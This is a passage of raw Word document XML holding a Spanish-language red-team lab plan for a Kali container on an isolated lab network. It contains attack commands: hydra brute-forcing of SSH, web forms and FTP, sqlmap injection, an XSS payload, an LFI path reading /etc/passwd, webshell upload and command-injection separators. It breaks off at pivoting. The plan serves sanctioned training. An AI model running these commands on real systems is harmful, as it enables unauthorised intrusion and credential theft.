          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  --cap-add=NET_ADMIN --cap-add=NET_RAW \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  -v $(pwd)/loot:/root/loot \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="160" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  kalilinux/kali-rolling /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El volumen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">-v $(pwd)/loot:/root/loot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> permite persistir capturas, logs y notas entre sesiones, incluso si el contenedor se destruye. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sin esto, toda la evidencia se pierde al cerrar el contenedor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 Instalación de herramientas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La imagen kali-rolling viene con paquetes mínimos. Una vez dentro del contenedor, se instalan las herramientas que se usarán durante el proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">apt update</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">apt install -y \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  nmap hydra nikto gobuster enum4linux \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  hping3 slowhttptest apache2-utils \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  netcat-openbsd dnsutils whois \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="160" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  sqlmap metasploit-framework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DFE" w:sz="1"/>
              <w:left w:val="single" w:color="534AB7" w:sz="18"/>
              <w:bottom w:val="single" w:color="EEEDFE" w:sz="1"/>
              <w:right w:val="single" w:color="EEEDFE" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EEEDFE" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="534AB7"/>
              </w:rPr>
              <w:t xml:space="preserve">Verificación rápida</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="534AB7"/>
              </w:rPr>
              <w:t xml:space="preserve">Antes de cualquier ataque, validar conectividad: ping 172.20.0.&lt;ip-objetivo&gt; debe responder. Si no responde, revisar que ambos contenedores estén en lab-net con docker network inspect lab-net.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Guía de ataques por fases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esta sección concentra el catálogo de técnicas que el equipo ejecutará. El proyecto exige al menos tres actividades ofensivas; el plan incluye más para dar margen al informe y permitir descartes si alguna no aplica al entorno final.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 Reconocimiento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Acción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Comando</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Evidencia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Ping sweep</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nmap -sn 172.20.0.0/24</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Lista de hosts activos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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DNS / banner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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dig @&lt;dns&gt; dominio.lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Información del entorno</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2 Escaneo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Tipo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="40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Comando</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Para qué</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Puertos TCP completos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nmap -sS -p- &lt;ip&gt;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Mapa de servicios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Versión + SO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="40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nmap -sV -O &lt;ip&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Versiones vulnerables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Scripts de vulnerabilidades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nmap --script vuln &lt;ip&gt;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CVEs conocidos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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UDP selectivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="40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nmap -sU --top-ports 50 &lt;ip&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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DNS, SNMP, NTP expuestos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3 Enumeración por servicio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SMB: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">enum4linux -a &lt;ip&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient -L //&lt;ip&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — usuarios, shares, políticas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">nikto -h http://&lt;ip&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster dir -u http://&lt;ip&gt; -w wordlist.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — rutas ocultas, paneles admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SSH: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">banner grabbing con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">nc &lt;ip&gt; 22</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, identificar versión.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">FTP: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">probar login anónimo con usuario </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">anonymous</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -c public -v1 &lt;ip&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> si está expuesto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.4 Ataques de credenciales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Servicio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="75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Comando</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SSH</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hydra -L users.txt -P rockyou.txt ssh://&lt;ip&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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HTTP form</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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hydra -l admin -P passwords.txt &lt;ip&gt; http-post-form "/login:user=^USER^&amp;pass=^PASS^:F=incorrect"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FTP</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120" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">hydra -L users.txt -P passwords.txt ftp://&lt;ip&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="3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DFE" w:sz="1"/>
              <w:left w:val="single" w:color="534AB7" w:sz="18"/>
              <w:bottom w:val="single" w:color="EEEDFE" w:sz="1"/>
              <w:right w:val="single" w:color="EEEDFE" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EEEDFE" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="534AB7"/>
              </w:rPr>
              <w:t xml:space="preserve">Atajo recomendado</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="534AB7"/>
              </w:rPr>
              <w:t xml:space="preserve">Antes de lanzar diccionarios completos, probar manualmente las credenciales por defecto más comunes: admin/admin, root/root, admin/password. En labs es el "atajo" que más se da.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.5 Explotación web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "http://&lt;ip&gt;/page.php?id=1" --dbs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">XSS: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">payloads manuales como </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en inputs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">LFI / Path Traversal: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">http://&lt;ip&gt;/page.php?file=../../../../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File upload: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">subir webshell PHP si el filtro es débil.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Command injection: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">probar separadores </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">; &amp; |</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en inputs que invoquen comandos del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.6 Explotación de servicios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit &lt;servicio&gt; &lt;versión&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para buscar exploits públicos asociados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metasploit como último recurso: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">search &lt;servicio&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → módulo apropiado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Documentar siempre el CVE asociado en el informe final.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.7 Denegación de servicio (DoS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La fase de DoS está cubierta en detalle en la Sección 8 de este documento. Se ejecuta al final del laboratorio, después de recolectar el resto de evidencias, y siempre coordinada con el Blue Team.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.8 Post-explotación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Privesc en Linux: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — buscar SUID, cron, exploits de kernel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Privesc en Windows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">winpeas.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pivoting: </w:t>
